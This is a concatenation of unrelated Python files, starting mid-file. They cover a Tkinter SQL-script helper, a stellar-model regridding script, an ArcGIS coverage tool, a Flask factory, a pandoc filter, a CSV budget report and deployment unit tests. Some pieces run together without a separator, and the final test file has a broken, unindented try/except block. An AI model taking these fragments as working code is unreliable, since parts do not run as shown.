                #print('s1=%s groups 0=%s 1=%s 2=%s 3=%s' % (s1, g[0], g[1], g[2], g[3]))
                s1 = g[0] + g[1] + str(i+48) + g[3] +g[4]
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, s1)
    def onBlock3340to4148(self):
        """Shift the standalone numbers 33..40 in the text up by 8 (to 41..48)."""
        s1 = self.st.get('1.0', END+'-1c')
        for i in range(33,40+1):
            # "xx,", "xx ", "xx)", "xx-"
            ma = re.compile(r'(.*)([^0-9])('+str(i)+')([^0-9])(.*)', re.DOTALL)
            while True:
                mo = ma.match(s1)
                if mo is None: break
                g = mo.groups()
                #print('s1=%s groups 0=%s 1=%s 2=%s 3=%s' % (s1, g[0], g[1], g[2], g[3]))
                s1 = g[0] + g[1] + str(i+8) + g[3] +g[4]
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, s1)
    def onSplit(self):
        """Stub: split a long line into lines of 5 positions.

        The core loop is still commented out, so currently only the leading
        indentation of the first line is emitted.
        """
        s = self.st.get('1.0', END+'-1c')
        ma = re.compile(r'^( *)(.*)')
        mo = ma.match(s)
        s_ident = ''
        s_text = s
        if not mo is None:
            g = mo.groups()
            s_ident = g[0]
            s_text = g[1]
        s_res = ''
        """
        while True:
            for i in range(1, s_text.len()):
                cnt = 0
                if s_text[i] == '+':
                    cnt = cnt + 1
                if cnt mod 5 == 0:
                    s_res = s_res + s_text[:i]
                    s_text = s_text[i:]
                    break
        """
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, s_ident + s_res)
    def onSubst(self):
        """Split a ';'-delimited line into separate lines."""
        s = self.st.get('1.0', END+'-1c')
        s2 = ''
        for s1 in s.split(r';'):
            s2 = s2 + '\n' + s1
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, s2)
    def onScript(self):
        """Generate an SQL*Plus roll-out script from a server/schema directory
        tree of DB objects (for the service-expansion project)."""
        def t_dir(dname, lname):
            # Emit the script body for one server/schema directory.
            def t_file(name):
                # prompt + @@-include for a single object file.
                s = ''
                s = s + 'prompt\n'
                s = s + 'prompt Exec ' + name + '\n'
                s = s + 'prompt ===========================\n'
                s = s + '@@' + server_name + '\\' + schema_name + '\\' + name + '\n'
                return s
            def t_ext(ext):
                # All files with the given extension, in os.listdir order.
                names = [fname for fname in os.listdir(dname) if (os.path.isfile(os.path.join(dname, fname)) and fname.endswith('.' + ext))]
                s = ''
                for x in names:
                    s = s + t_file(x) + '\n'
                return s
            s = ''
            s = s + 'set define off\n'
            s = s + 'spool ' + lname + '\n'
            s = s + '\n'
            # Object types in roll-out order: tables, views, mat. views, ...
            s = s + t_ext('tab')
            s = s + t_ext('vw')
            s = s + t_ext('mv')
            s = s + t_ext('sql') # Also with views
            s = s + t_ext('tps')
            s = s + t_ext('trg')
            s = s + t_ext('fnc')
            s = s + t_ext('prc')
            s = s + t_ext('pck')
            s = s + 'prompt All done.\n'
            s = s + '\n'
            s = s + 'spool off\n'
            s = s + '\n'
            return s
        # NOTE(review): hard-coded local path — adjust per machine.
        root_name = r'C:\Users\KSHIPKOV\Documents\SVN\HS\Materials\Source code\Oracle\48to96\Output'
        s = ''
        server_names = [sname for sname in os.listdir(root_name) if os.path.isdir(os.path.join(root_name, sname))]
        for server_name in server_names:
            schema_names = [sname for sname in os.listdir(os.path.join(root_name, server_name)) if os.path.isdir(os.path.join(root_name, server_name, sname))]
            for schema_name in schema_names:
                s = s + 'file: ' + server_name + '_' + schema_name + '.sql\n'
                lname = server_name + '_' + schema_name + '.log'
                dname = os.path.join(root_name, server_name, schema_name)
                s = s + t_dir(dname, lname)
        self.st.insert(END, s)
    def onSubst1(self):
        """Wrap 'nachNN' columns into nullif(nachNN,0) on every matching line."""
        s = self.st.get('1.0', END+'-1c')
        sr = ''
        ma = re.compile(r'(.*), nach([0-9]*),(.*)')
        for s1 in s.split('\n'):
            mo = ma.match(s1)
            if not mo is None:
                g = mo.groups()
                s2 = g[0] + ', nullif(nach' + g[1] + ',0) nach' + g[1] + ','+ g[2]
            else:
                s2 = s1
            sr = sr + s2 + '\n'
        self.st.insert(END, '===================================================\n')
        self.st.insert(END, sr)
    def onClear(self):
        """Empty the text widget."""
        self.st.delete('1.0', END)
    def onDestroy(self, event):
        # No teardown needed; kept as an explicit hook.
        pass
if __name__ == '__main__':
    # Standalone launch: build the root window and run the Tk event loop.
    root = Tk()
    root.title("SLETool1")
    SLETool(root).mainloop()
|
"""
write a function, calculate the number of a e i o u in the letter
"""
def count_vowel(s):
    """Return how many characters of `s` are vowels (a/e/i/o/u, any case).

    Raises ValueError when `s` is not a string.
    """
    if not isinstance(s, str):
        raise ValueError("ValueError: input must be a string")
    if len(s) == 0:
        return 0
    vowels = ('a', 'e', 'i', 'o', 'u')
    return sum(1 for ch in s if ch.lower() in vowels)
if __name__ == '__main__':
    # Ad-hoc smoke tests; the commented call demonstrates the ValueError path.
    print("{}: {}".format("aeiouAEIOU", count_vowel("aeiouAEIOU")))
    # print("{}: {}".format(5, count_vowel(5)))
    print("{}: {}".format("", count_vowel("")))
    print("{}: {}".format("batch", count_vowel("batch")))
|
##############Creates se files:
##This script writes the data of cycle cycle_all from file run_H5 into
##the sefile outputfile for a number of cycles given by cycles variable
##NOTE: Python 2 script (print statements); depends on the NuGrid
##nugridse/sewrite packages.
import nugridse as mp
import sewrite as sw
import numpy as np
###############Read se file to get header information
run_H5='e2D14.0077501.se.h5'
cycle_all=77991
sefiles=mp.se('.',run_H5,rewrite=True)
hattrs=sefiles.se.hattrs
hattrs_data=[]
for k in range(len(hattrs)):
    # Force the age unit to 1.0; copy every other header attribute verbatim.
    if hattrs[k]=='age_unit':
        hattrs_data.append(1.)
        continue
    hattrs_data.append(sefiles.get(hattrs[k]))
cattrs=[]
for k in range(len(sefiles.se.cattrs)):
    # age/deltat/shellnb are rewritten per cycle below, so skip them here.
    if ((sefiles.se.cattrs[k] == 'age') or (sefiles.se.cattrs[k] == 'deltat')) or (sefiles.se.cattrs[k]=='shellnb'):
        continue
    cattrs.append(str(sefiles.se.cattrs[k]))
cattrs_data=[]
for k in range(len(cattrs)):
    cattrs_data.append(sefiles.get(cycle_all,str(cattrs[k])))
dcols=["dcoeff","radius","rho","temperature"]
dcols_data=[]
for k in range(len(dcols)):
    #print dcols[k]
    dcols_data.append(sefiles.get(cycle_all,dcols[k]))
mass2=sefiles.get(cycle_all,'mass')
age=sefiles.get(cycle_all,'age') # unit in years
deltat=sefiles.get(cycle_all,'deltat') #unit in s
#use the radius below
#plt.figure()
#plt.plot(mass,radius,label='radius special')
#plt.legend()
#plt.figure()
########Grid changes/mesh refinement:
#mass2 represents the se restart grid, see first section in file
#xm in fortran with maximum poosibble grid size entries/empty
#dxm from ppn_frame.input
dxm=1e-4
xmrmaxi=0.5987
xmrmin=0.57556
# Refinement zones: below xmsg[j] the step dxmsg[j] overrides the default dxm.
xmsg=[0.5880, 0.5890 ,0.5979]
dxmsg=[4.e-4,6.e-5,4.e-4]
xm = [xmrmin]
dq=[7.e-4] #mass grid se, set first cell size to this value
dq=[6.e-4]
dq=[7.5e-4]
#dq between 0 and 2*4e-4, for dq=7e-4 shows no negative dq anymore
#dq between 0 and 2*4e-4
xmrmax=max(mass2)
xmrmax = min(xmrmaxi,xmrmax)
ddxm=dxm
ddxm1=dxm
i=0
# Build the new mass grid xm (cell centres) and cell sizes dq outward from
# xmrmin until xmrmax is reached.
while(True):
    ddxm=dxm
    for j in range(len(xmsg))[::-1]:
        if xm[i]+dxmsg[j] < xmsg[j]:
            ddxm=dxmsg[j]
            #print 'change xm at mass',xm[i],ddxm,i
    i+=1
    xm.append(round(xm[i-1] + ddxm,10))
    dq.append(round(2* (ddxm - dq[-1]/2.),10 ))
    if xm[i] >=xmrmax:
        xm[i] = xmrmax
        break
#result: xm,xmm, xm center, xmm, outer boundary
xm1=xm
shellnb=len(xm)
#Checck ingestion arad: how many cells?
#if(xm(j).ge.xmrmax-4.d-4)then
counter=0
for k in range(len(xm)):
    if xm[k]>=(xm[-1]-4e-4 ):
        counter+=1
print 'Number of cells in which H will be ingested:'
print counter
##below for findig the right start dq which gives the for all other dq>0
#plt.figure()
#plt.plot(xm1,dq,label='dq/delta mass')
#diff=(np.array(xm[1:])-np.array(xm[:-1]))
#plt.plot(xm[1:],diff,label='xm diff',marker='o',markevery=1)
############ Interpolate other parameter (rho,T) on new grid
#adapt those parameter below on new grid/except mass,
#mass2: outer boundary of cell, from e2D14.0077501.se.h5
#the original routine l. 1862 needs the grid of the se input file xmm
#+ the new mppnp grid xm (with center mass coord)
# therefore take mass2 as xmm, and xm from above
dcols_name=["dcoeff","radius","rho","temperature"]
#data in dcols_data
#number of shells mi,
#mi=len(mass2)
xmm=mass2 #from se file
from operator import itemgetter
xfind = 0.
ifindpos = 0
rhoppg=[]
t9ppg=[]
dppg = []
rppg = []
#carries the modified diffusion coeff
dppgLagr=[]
dppgLagr_split=[]
dppg_split=[]
#print hattrs
dcoeff_unit=hattrs_data[hattrs.index('dcoeff_unit')][0]
rho_unit=hattrs_data[hattrs.index('rho_unit')][0]
temperature_unit=hattrs_data[hattrs.index('temperature_unit')][0]
radius_unit=hattrs_data[hattrs.index('radius_unit')][0]
#print test
#print 'age unit',hattrs_data[hattrs.index('age_unit')][0] #in years
#print dcoeff_unit,rho_unit,temperature_unit,radius_unit
# Linear interpolation of rho, T, D and radius from the se grid (xmm) onto
# every point of the new grid (xm).
for j in range(len(xm)):
    xfind = xm[j]
    #ifindpos = MINLOC (xmm(1:mi), MASK = xmm(1:mi) .GT. xfind)
    # Index of the smallest se grid point strictly above xfind.
    ifindpos=list(xmm).index(min(x for x in xmm if x > xfind))
    x=xfind
    x1=xmm[ifindpos]
    x2=xmm[ifindpos+1]
    y1=dcols_data[2][ifindpos] *rho_unit #dcol_data[2] is rho
    y2=dcols_data[2][ifindpos+1] *rho_unit
    rhoppg.append(y1+((y2-y1)/(x2-x1))*(x-x1) )
    # if (ifindpos(1).eq.0) print *,"j, xfind, ifindpos: ",j, xfind,
    #$ ifindpos,(xmm(i),i=1,2)
    #rhoppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
    #$ ,rhose(ifindpos(1)),rhose(ifindpos(1)+1))
    y1=dcols_data[3][ifindpos] *temperature_unit #dcol_data[3] temperature
    y2=dcols_data[3][ifindpos+1] *temperature_unit
    t9ppg.append( ( y1+((y2-y1)/(x2-x1))*(x-x1)))
    #print 't9ppg'
    #print ( y1+((y2-y1)/(x2-x1))*(x-x1))
    # t9ppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
    #$ ,t8se(ifindpos(1)),t8se(ifindpos(1)+1))
    #
    y1=dcols_data[0][ifindpos]*dcoeff_unit # [d] = cm^2/s
    y2=dcols_data[0][ifindpos+1]*dcoeff_unit
    dppg.append( ( y1+((y2-y1)/(x2-x1))*(x-x1)) )
    # dppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
    #$ ,dse(ifindpos(1)),dse(ifindpos(1)+1))
    y1=dcols_data[1][ifindpos] *radius_unit#radius
    y2=dcols_data[1][ifindpos+1] *radius_unit
    rppg.append( ( y1+((y2-y1)/(x2-x1))*(x-x1)))
    # rppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
    #$ ,rse(ifindpos(1)),rse(ifindpos(1)+1))
    ###here in loop adapt diffusion coefficient
    dconst = 3.0589703419947736e-11
    dconst=6.314572864321608e-33
    #C *** transform to Lagrangian coordinate: D_Lagr = (4*PI*R**2*RHO)**2*D_Eularian
    #C *** and also delta_xm in mixdiffnet is in solar mass units, and since there is
    #C *** a second order spatial derivative:
    #C D_Lagr,mppn = (4*PI*R^2*RHO/Msun)**2*D_Eularian
    #C solar constants: radius 6.96E10cm, mass 1.99E33 g
    #C units from reading HPF files: [R]=Rsun, [rho]=cgs
    #C 4*Pi*Rsun^2/Msun = 3.0589703419947736e-11
    # Placeholders stay 0 where D <= 0; overwritten below otherwise.
    dppgLagr.append(0)
    dppgLagr_split.append(0)
    if (dppg[j]>0):
        if (j==1):
            RH = np.log(rhoppg[j]) #rhoppg
            HLOG = np.log(rppg[j]) #rppg in cm
        else:
            # Cell-interface average of log(rho) and log(r).
            RH = (np.log(rhoppg[j]) + np.log(rhoppg[j-1]))/2.
            HLOG = (np.log(rppg[j]) + np.log(rppg[j-1]))/2.
        #endif ! dppgLagr: Lagrangian coordinates assuming solar mass units
        #if (ksubc.ge.isplitstart .and. isplit.eq.1) then
        # Gaussian suppression of D around xmsplit (the "split" variant).
        a1=1.e4
        a2=1.e7
        xmsplit=0.5885
        #print xm, xmsplit
        dsplit = dppg[j] / (1. + a2*np.exp(-(a1*(xm[j]-xmsplit))**2))
        #else
        # dsplit = dppg(J)
        #end if
        dppg_split.append(dppg[j] / (1. + a2*np.exp(-(a1*(xm[j]-xmsplit))**2)))
        dppgLagr_split[j] = dsplit * (dconst**2)*np.exp(2*(2*HLOG+RH))
        dsplit = dppg[j]
        dppgLagr[j] = dsplit * (dconst**2)*np.exp(2*(2*HLOG+RH))
        #ppgLagr(j) = dsplit * dconst**2*exp(2*(2*HLOG+RH))
        #dppgLagr(j) = dppg(J) * dconst**2.*exp(2.d0*(2.d0*HLOG+RH))
##########Do some test polotting
if (False):
    '''
    plt.plot(xm1,t9ppg,label='T9',marker='o',markevery=1)
    plt.xlabel('mass coordinate')
    plt.ylabel('temperature')
    plt.figure()
    plt.legend()
    plt.plot(xm1,rhoppg,label='Rho',marker='o',markevery=1)
    plt.legend()
    plt.xlabel('mass coordinate')
    plt.ylabel('Rho')
    plt.figure()
    plt.plot(xm1,np.log10(dppgLagr),label='se diffusion')
    plt.plot(xm1,np.log10(dppgLagr_split),label='Modification of se diffusion')
    #plt.yscale('log')
    plt.xlabel('mass coordinate')
    plt.ylabel('Log Diffusion coefficient')
    plt.legend()
    plt.figure()
    plt.plot(xm1,dppg,label='dppg')
    plt.plot(xm1,dppg_split,label='dppg split')
    plt.legend()
    plt.figure()
    plt.plot(xm1,dppg,label='dppg')
    plt.plot(xm1,dppg_split,label='dppg split')
    plt.legend()
    plt.xlabel('mass coordinate')
    plt.ylabel('D [cm^2/s]')
    '''
    plt.figure('test')
    plt.plot(xm1,dq,label='dq '+str(dq[0]),marker='o',markevery=1)
    #diff=(np.array(xm1[1:])-np.array(xm1[:-1]))
    #plt.plot(xm1[1:],diff,label='xm1 diff',marker='o',markevery=1)
    #plt.legend()
    #plt.ylim(-1e-5,1e-3)
#print 'XM ...'
#print xm1[:5]
###############Write out cycle_all for each cycle of cycles
##Important: change 'age','deltat' so that timesteps of 63s
# NOTE(review): deltat is in seconds while age was read in years; the unit
# conversion factor is commented out at the bottom — confirm intended.
deltat=63. #s
cycles=range(77991,(77991+3002))
# Cycle numbers at which a new output file is started.
cycle_bndy=[77991,78001,78501,79001,79501,80001,80501,81001]
outputfiles=['e2D14_hif.0077501.se.h5','e2D14_hif.0078001.se.h5','e2D14_hif.0078501.se.h5','e2D14_hif.0079001.se.h5','e2D14_hif.0079501.se.h5','e2D14_hif.0080001.se.h5','e2D14_hif.0080501.se.h5']
i=0
#for se files inverted mass, surface is first element
dppg=dppg[::-1]
dppgsplit=dppg_split[::-1]
dppgLagr=dppgLagr[::-1]
rppg=rppg[::-1]
xm1=xm1[::-1]
dq=dq[::-1]
rhoppg=rhoppg[::-1]
t9ppg=t9ppg[::-1]
print 'compare types'
print type(dppgLagr),type(dppg),type(dppg_split)
for cyc in cycles:
    cyc = int(cyc)
    # Start the next output file when a boundary cycle is reached.
    if cyc==cycle_bndy[i]:
        print 'start writing in file ',outputfiles[i]
        f=sw.startfile(outputfiles[i])
        f.write_hattr(hattr_name=hattrs,hattr_val=hattrs_data)
        #Add specific header info about first cycle
        f.write_hattr(hattr_name=['firstcycle'],hattr_val=[np.array([cyc], dtype=np.int32)])
        i+=1
    #f.write_dcol(cyc,dcol_name=dcols,dcol_val=dcols_data)
    #start with split
    #here the Mesa se mass coord for 'mass' and delta mass were chosen
    # From cycle 951 onward write the split (suppressed) diffusion profile.
    if cyc>=(951+77991):
        f.write_dcol(cyc,dcol_name=["dcoeff","radius","mass","delta_mass","rho","temperature"],dcol_val=[dppgsplit,rppg,xm1,dq,rhoppg,t9ppg])
    else:
        f.write_dcol(cyc,dcol_name=["dcoeff","radius","mass","delta_mass","rho","temperature"],dcol_val=[dppg,rppg,xm1,dq,rhoppg,t9ppg])
    f.write_cattr(cyc,cattr_name=cattrs,cattr_val=cattrs_data)
    #due to timesteps of 63s
    f.write_cattr(cyc,cattr_name=['deltat','age','shellnb'],cattr_val=[deltat,age,shellnb])
    age+=(deltat) #age als oin years #*3.1689e-8)
|
# ------------------------------------------------------------------------------
# Metropolitan Form Analysis Toolbox-Coverage
# Credit: Reza Amindarbari, Andres Sevtsuk
# City Form Lab
# for more infomation see:
# Amindarbari, R., Sevtsuk, A., 2013, "Measuring Growth and Change in Metropolitan Form"
# presented at the Urban Affairs Association annual conference in San Francisco
# ------------------------------------------------------------------------------
import sys, arcpy
arcpy.env.overwriteOutput=1
def getarea(fc):
    """Sum the AREA attribute (square kilometres) over every feature of `fc`.

    Adds and computes the AREA field first when it does not exist yet.
    """
    # BUG FIX: arcpy.ListFields returns Field objects, so the original test
    # `"AREA" not in fields` compared a string to objects and was ALWAYS
    # True, re-adding/recomputing the field on every call. Compare names.
    # NOTE(review): an existing AREA field is now trusted as up to date —
    # confirm no caller relies on the unconditional recompute.
    field_names = [field.name for field in arcpy.ListFields(fc)]
    if "AREA" not in field_names:
        arcpy.AddField_management (fc, "AREA","DOUBLE")
        arcpy.CalculateField_management (fc, "AREA", '!shape.area@squarekilometers!','PYTHON')
    fc_area=0
    cursor = arcpy.SearchCursor(fc)
    for row in cursor:
        fc_area=fc_area+row.getValue('AREA')
    # Release the cursor's lock on the dataset.
    del cursor
    return fc_area
# Tool parameters: built-up layer, optional unbuildable layers, output dir.
blt=sys.argv[1]
unb=sys.argv[2]
out_dir=sys.argv[3]
# Geodatabases take bare names; folders need .shp extensions.
dsc=arcpy.Describe(out_dir)
if dsc.dataType=="Workspace":
    convex=out_dir+"/"+"convex"
    unb_merged=out_dir+"/"+"unb_merge"
    unb_clip=out_dir+"/"+"unb_clip"
elif dsc.dataType=="Folder":
    convex=out_dir+"/"+"convex.shp"
    unb_merged=out_dir+"/"+"unb_merge.shp"
    unb_clip=out_dir+"/"+"unb_clip.shp"
# Convex hull of all built-up features = the metropolitan envelope.
arcpy.MinimumBoundingGeometry_management (blt, convex, 'CONVEX_HULL', 'ALL')
convex_area=getarea(convex)
blt_area=getarea(blt)
if unb!='false' and unb!='#':
    # Coverage excluding unbuildable land clipped to the hull.
    arcpy.AddMessage(str(unb))
    arcpy.Merge_management(unb, unb_merged)
    arcpy.Clip_analysis (unb_merged, convex,unb_clip)
    unb_area=getarea(unb_clip)
    msg=str(blt_area/(convex_area-unb_area))
    arcpy.AddMessage('Coverage: '+msg)
    arcpy.Delete_management(unb_merged)
    arcpy.SetParameterAsText(3,convex)
    arcpy.SetParameterAsText(4,unb_clip)
else:
    # No unbuildable layers: coverage is built area over hull area.
    msg=str(blt_area/convex_area)
    arcpy.AddMessage('Coverage: '+msg)
    arcpy.SetParameterAsText(3,convex)
print msg
from flask import Flask, Blueprint
def create_app():
    """Application factory: construct the Flask app and attach blueprints."""
    app = Flask(__name__)
    # Local imports keep the blueprint modules from loading at package import time.
    from app.echo import echo
    from app.root import root
    for blueprint in (echo, root):
        app.register_blueprint(blueprint)
    return app
|
class Carro:
    """Simple car model: wheel count and colour."""

    # Class-level defaults; __init__ shadows them with per-instance values.
    quantidadeRodas = 4
    cor = "azul"

    def __init__(self, quantidadeRodas, cor):
        self.quantidadeRodas = quantidadeRodas
        self.cor = cor

    def setQuantidadeRodas(self, quantidadeRodas):
        """Update this car's wheel count."""
        self.quantidadeRodas = quantidadeRodas
# Quick demo: build a car and read the wheel count back (value is discarded).
meuCarro1 = Carro(10, "azul")
meuCarro1.quantidadeRodas
|
#!/usr/bin/python3
from panflute import *
def demote_header(elem, doc):
    """Demote every header by one level so no first-level headers remain.

    First-level headers are reserved for the daily headers."""
    if not isinstance(elem, Header):
        return
    elem.level += 1
def simple_id(filename):
    """Collapse `filename` down to just its digit characters."""
    return ''.join(filter(str.isdigit, filename))
def fix_header_id(elem, doc):
    """Prefix each header identifier with the digits of the document title
    (its date) so identifiers stay unique across concatenated days."""
    if isinstance(elem, Header):
        date_prefix = simple_id(str(doc.metadata['title']))
        elem.identifier = '{}:{}'.format(date_prefix, elem.identifier)
def combine_filters(*filters):
    """Compose several panflute filters into a single callable.

    The returned function invokes each filter in the order given and
    discards their return values (mutation-style filters)."""
    def apply_all(elem, doc):
        for single_filter in filters:
            single_filter(elem, doc)
    return apply_all
def main(doc=None):
    """Entry point: run the combined header filters over `doc`."""
    combined = combine_filters(demote_header, fix_header_id)
    return run_filter(combined, doc=doc)
if __name__ == '__main__':
    # Invoked by pandoc as a filter: reads the AST on stdin, writes to stdout.
    main()
|
import numpy as np
# LOAD TXT AND SAVE AS NPY
# Convert the comma-separated label file into a .npy array of string labels.
data = np.loadtxt("labels.txt", delimiter=",")
bigNpy = []
for i in range(0, 1200):
    # BUG FIX: the original appended the undefined name `thisLabel`
    # (NameError on the first iteration); keep all three label columns
    # per row instead.
    # NOTE(review): assumes each of the 1200 rows has 3 comma-separated
    # values — confirm against labels.txt.
    row_labels = [str(data[i][0]), str(data[i][1]), str(data[i][2])]
    bigNpy.append(row_labels)
np.save("labelsNpy.npy", bigNpy)
# # LOAD NPY FIRST
# aa = np.load("labelsNpy.npy")
# ab = aa[0]
#
#
# a = 4 |
import tensorflow as tf
import commons.mnist.inf.model_def as model_def
class InferenceNetwork(object):
    """Pre-trained MNIST classifier restored from a checkpoint.

    Builds the TF1 inference graph once at construction time and keeps a
    dedicated tf.Session alive for repeated get_y_hat_val() calls.
    """
    def __init__(self):
        self.sess = tf.Session()
        # NHWC batch of 28x28 single-channel images.
        self.x_ph = tf.placeholder(tf.float32, shape=[None, 28, 28, 1], name='x_ph')
        self.logits, self.y_hat, self.keep_prob = model_def.infer(self.x_ph, 'inf')
        # Restore only the variables the inference model declares restorable.
        restore_vars = model_def.inf_restore_vars()
        restore_dict = {var.op.name: var for var in tf.global_variables() if var.op.name in restore_vars}
        # keep_prob = 1.0 disables dropout at inference time.
        self.default_feed_dict = {self.keep_prob : 1.0}
        inf_restorer = tf.train.Saver(var_list=restore_dict)
        # NOTE(review): checkpoint path is hard-coded and relative to the CWD.
        inf_restore_path = tf.train.latest_checkpoint('./commons/mnist/inf/ckpt/bs64_lr0.0001/')
        inf_restorer.restore(self.sess, inf_restore_path)
    def get_y_hat_val(self, x_sample_val):
        """Return the network's prediction for the given input batch."""
        self.default_feed_dict[self.x_ph] = x_sample_val
        y_hat_val = self.sess.run(self.y_hat, feed_dict=self.default_feed_dict)
        return y_hat_val
|
#!/usr/bin/python
#Print a dictionary with a nice format
def PrintDict(d,indent=0):
    # Recursively pretty-print nested dicts, one extra indent level per depth.
    # Python 2 print statements; `d` may be any mapping providing .items().
    for k,v in d.items():
        if type(v)==dict:
            print ' '*indent,'[',k,']=...'
            PrintDict(v,indent+1)
        else:
            print ' '*indent,'[',k,']=',v
#Container class that can hold any variables
#ref. http://blog.beanz-net.jp/happy_programming/2008/11/python-5.html
class TContainer:
    # Dict-like facade over the instance __dict__: attributes assigned to a
    # TContainer become items accessible via [], in, items(), keys(), etc.
    # (Python 2: iteration uses itervalues/iteritems.)
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return str(self.__dict__)
    def __iter__(self):
        # Iterates over stored VALUES, not keys.
        return self.__dict__.itervalues()
        #return self.__dict__.iteritems()
    def items(self):
        return self.__dict__.items()
    def iteritems(self):
        return self.__dict__.iteritems()
    def keys(self):
        return self.__dict__.keys()
    def values(self):
        return self.__dict__.values()
    def __getitem__(self,key):
        return self.__dict__[key]
    def __setitem__(self,key,value):
        self.__dict__[key]= value
    def __delitem__(self,key):
        del self.__dict__[key]
    def __contains__(self,key):
        return key in self.__dict__
class TTest:
    # Toy class that reports its construction, deletion and identity,
    # used below to observe object lifetimes inside a TContainer.
    def __init__(self,x):
        self.x= x
        print 'Test class',self.x
    def __del__(self):
        print 'Deleted',self.x
    def Print(self):
        print 'This is',self.x
def main():
    # Demo: fill a TContainer with TTest objects, iterate it, then delete
    # every entry by key and show the (now empty) container.
    cont= TContainer()
    cont.var_1= TTest(1.23)
    cont.var_2= TTest('hoge')
    cont.var_3= TTest('aa aa')
    #print cont
    if 'var_2' in cont: print 'var_2 is contained'
    PrintDict(cont)
    for i in cont:
        i.Print()
        del i
    #for v in cont:
    #del v
    #for k,v in cont.items():
    #v.Print()
    #del cont[k]
    #del k,v
    # keys() returns a list copy in Python 2, so deleting while looping is safe.
    for k in cont.keys():
        print 'del',k,cont[k].x
        del cont[k]
    #del cont.var_1
    #del cont.var_2
    #del cont.var_3
    PrintDict(cont)
    print '----'
print '----'
if __name__=='__main__':
    main()
# Runs after main() returns; by now every TTest should have printed 'Deleted'.
print '===='
|
#modules (libraries)
import os
import csv
# Set the path to access the file
csvpath = os.path.join("Resources", "budget_data.csv")
# Define total months
total_months = 0
# Define net total
net_total = 0
# Define list of change values
empty_list = []
month_list = []
profit_list = []
monthly_profit_change = []
net_change=0
# [month, amount] trackers for the extreme month-over-month changes.
greatest_increase = ["",0]
greatest_decrease = ["",0]
# Open the CSV
with open(csvpath) as csvfile:
    csvreader = csv.reader(csvfile)
    # Acknowledge the header and read the first data row separately so the
    # change calculation has a previous value to diff against.
    csv_header = next(csvreader)
    first_row = next(csvreader)
    month_list.append(first_row[0])
    # append the profit list
    profit_list.append(int(first_row[1]))
    #
    total_months = total_months + 1
    #
    net_total = net_total + int(first_row[1])
    #
    #changes = int(first_row[1])
    prev_net = int(first_row[1])
    # Create a for loop to read through data after the header
    for row in csvreader:
        print(row)
        # Calculate the total months in the dataset
        total_months = total_months + 1
        print(total_months)
        month_list.append(row[0])
        # append the profit list
        profit_list.append(int(row[1]))
        # Net changes
        net_total = net_total + int(row[1])
        print(net_total)
        # Find the changes
        changes = int(row[1]) - prev_net
        empty_list.append(changes)
        prev_net = int(row[1])
        # Track greatest increase / decrease as we go.
        # NOTE(review): this duplicates the monthly_profit_change loop below —
        # `empty_list` already holds the same values; candidate for cleanup.
        if changes > greatest_increase[1]:
            greatest_increase[0]=row[0]
            greatest_increase[1] = changes
        if changes < greatest_decrease[1]:
            greatest_decrease[0]=row[0]
            greatest_decrease[1] = changes
# create a loop to get the monthly change in profits
for i in range(len(profit_list)-1):
    # Find the difference between any two months, and append to the monthly change in profits
    monthly_profit_change.append(profit_list[i+1]-profit_list[i])
#Calculating average monthly change
average_monthly_change = sum(monthly_profit_change) / len(monthly_profit_change)
#Set an output file
output=(f"\nAnalysis\n"
        f"----------------------------------------\n"
        f"Total Months:{total_months}\n"
        f"Total:${net_total}\n"
        f"Average Monthly Change:${average_monthly_change:.2f}\n"
        f"Greatest Increase Month:{greatest_increase[0]}(${greatest_increase[1]})\n"
        f"Greatest Decrease Month:{greatest_decrease[0]}(${greatest_decrease[1]})\n")
# Write the summary to disk and echo the key figures to stdout.
with open("file_to_create.txt","w") as txt_file:
    txt_file.write(output)
print(total_months)
print(net_total)
print(average_monthly_change)
print(greatest_increase)
print(greatest_decrease)
|
# Copyright (C) 2016 Nokia Corporation and/or its subsidiary(-ies).
import unittest
import tempfile
import os
import shutil
import datetime
import json
from deployment import samodels as m, execution, executils, database
from freezegun import freeze_time
try:
from unittest import mock
except ImportError as e:
import mock
class DummyStore():
    # Minimal stand-in for the deployment log store: accepts entries, drops them.
    def register_log_entry(self, deploy_id, log_entry):
        pass
class MyException(Exception):
    # Sentinel exception raised by the dummy step to exercise error paths.
    pass
class TestDeployment(unittest.TestCase):
    """Exercises execution.run_step() success, failure and logging paths."""
    def setUp(self):
        # Minimal config; mail notification list left empty on purpose.
        config = execution.GeneralConfig(base_repos_path='/tmp/tests/',
                                         haproxy_user="hauser",
                                         haproxy_password="hapwd",
                                         mail_sender='deploy@withings.com',
                                         notify_mails=[])
        self.deployment = execution.Deployment(1, config, mock.MagicMock(), mock.MagicMock())
        self.deployment.view = m.DeploymentView()
        self.session = mock.MagicMock()
    def _dummy_step(self, raise_exception=True, log_error=False):
        """Generator step: yields a description, optional log entries, then a result.

        raise_exception -- abort with MyException right after the description.
        log_error -- additionally yield an ERROR-severity log entry.
        """
        yield "Step description"
        if raise_exception:
            raise MyException("I was asked to raise an exception")
        yield m.LogEntry('some log', execution.Severity.INFO)
        if log_error:
            yield m.LogEntry('some error', execution.Severity.ERROR)
        yield "Step result"
    def test_run_step(self):
        # Happy path: result returned, log entries recorded on the view.
        step_output = execution.run_step(self.deployment, self._dummy_step, False, _session=self.session)
        self.assertEqual(step_output, "Step result")
        # First log entry is the step description
        self.assertEqual(2, len(self.deployment.view.log_entries))
        log_entry = self.deployment.view.log_entries[1]
        self.assertEqual("some log", log_entry.message)
        self.assertEqual(execution.Severity.INFO.format(), log_entry.severity)
    def test_run_step_failing(self):
        # A raising step is wrapped into DeploymentError.
        with self.assertRaises(execution.DeploymentError):
            execution.run_step(self.deployment, self._dummy_step, _session=self.session)
    def test_run_step_logging_error(self):
        # An ERROR-severity log entry aborts the step by default.
        with self.assertRaises(execution.DeploymentError):
            execution.run_step(self.deployment, self._dummy_step, False, True, _session=self.session)
    def test_run_step_no_abort_on_error(self):
        # With _abort_on_error=False the ERROR entry is tolerated.
        execution.run_step(self.deployment, self._dummy_step, raise_exception=False, log_error=True, _abort_on_error=False, _session=self.session)
